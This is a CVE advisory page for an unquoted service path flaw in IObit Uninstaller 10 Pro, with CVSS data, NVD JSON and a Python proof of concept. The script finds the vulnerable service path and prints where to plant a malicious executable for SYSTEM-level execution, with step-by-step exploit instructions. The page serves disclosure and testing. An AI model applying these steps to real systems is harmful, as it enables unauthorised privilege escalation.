Security Vulnerability Report
CVE-2020-36952 CVSS 7.8 HIGH

CVE-2020-36952

Published: 2026-01-26 16:15:55
Last Modified: 2026-04-15 00:35:42

Description

IObit Uninstaller 10 Pro contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted service path in the IObit Uninstaller Service to insert malicious code that would execute with SYSTEM-level permissions during service startup.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

IObit Uninstaller 10 Pro < 10.4.0.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2020-36952 PoC - IObit Uninstaller 10 Pro Unquoted Service Path

This PoC demonstrates how to exploit the unquoted service path vulnerability
to escalate privileges to SYSTEM level.

Note: This is for educational and authorized testing purposes only.
"""

import os
import subprocess
import sys


def check_service_path():
    """Check if the IObit Uninstaller service has an unquoted path with spaces"""
    try:
        # Query the service configuration using sc command
        result = subprocess.run(
            ['sc', 'qc', 'IObitUninstallerSvc'],
            capture_output=True,
            text=True
        )

        if 'BINARY_PATH_NAME' in result.stdout:
            print("[*] IObit Uninstaller Service found")
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f"[*] Service path: {path}")

                    # Check if path contains spaces and is not quoted
                    if ' ' in path and not path.startswith('"'):
                        print("[!] VULNERABLE: Unquoted path with spaces detected!")
                        return True, path
        return False, None
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False, None


def exploit_unquoted_path(service_path):
    """
    Exploit the unquoted service path by creating a malicious executable
    in the intermediate directory path.
    """
    # Extract path components
    path_parts = service_path.strip('"').split('\\')

    # Find the first directory with space in its name
    exploit_dir = None
    for i, part in enumerate(path_parts[:-1]):
        if ' ' in part:
            exploit_dir = '\\'.join(path_parts[:i+1])
            malicious_exe = os.path.join(exploit_dir, path_parts[i+1].split()[0] + '.exe')
            break

    if not exploit_dir:
        print("[-] No exploitable path component found")
        return False

    print(f"[*] Exploit directory: {exploit_dir}")
    print(f"[*] Malicious executable should be placed at: {malicious_exe}")
    print(f"[!] When service restarts, it will execute the malicious file with SYSTEM privileges")
    return True


def main():
    print("=" * 60)
    print("CVE-2020-36952 - IObit Uninstaller Unquoted Service Path")
    print("=" * 60)

    vulnerable, path = check_service_path()

    if vulnerable:
        print("\n[!] Target is VULNERABLE to CVE-2020-36952")
        exploit_unquoted_path(path)
        print("\n[*] To exploit:")
        print(" 1. Create a malicious executable")
        print(" 2. Place it in the exploit directory")
        print(" 3. Wait for service restart or reboot")
    else:
        print("\n[-] Target does not appear to be vulnerable")


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36952", "sourceIdentifier": "[email protected]", "published": "2026-01-26T16:15:54.690", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IObit Uninstaller 10 Pro contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted service path in the IObit Uninstaller Service to insert malicious code that would execute with SYSTEM-level permissions during service startup."}, {"lang": "es", "value": "IObit Uninstaller 10 Pro contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar código potencialmente con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio sin comillas en el Servicio de IObit Uninstaller para insertar código malicioso que se ejecutaría con permisos de nivel SYSTEM durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49371", "source": "[email protected]"}, {"url": "https://www.iobit.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/iobit-uninstaller-pro-unquoted-service-path", "source": "[email protected]"}]}}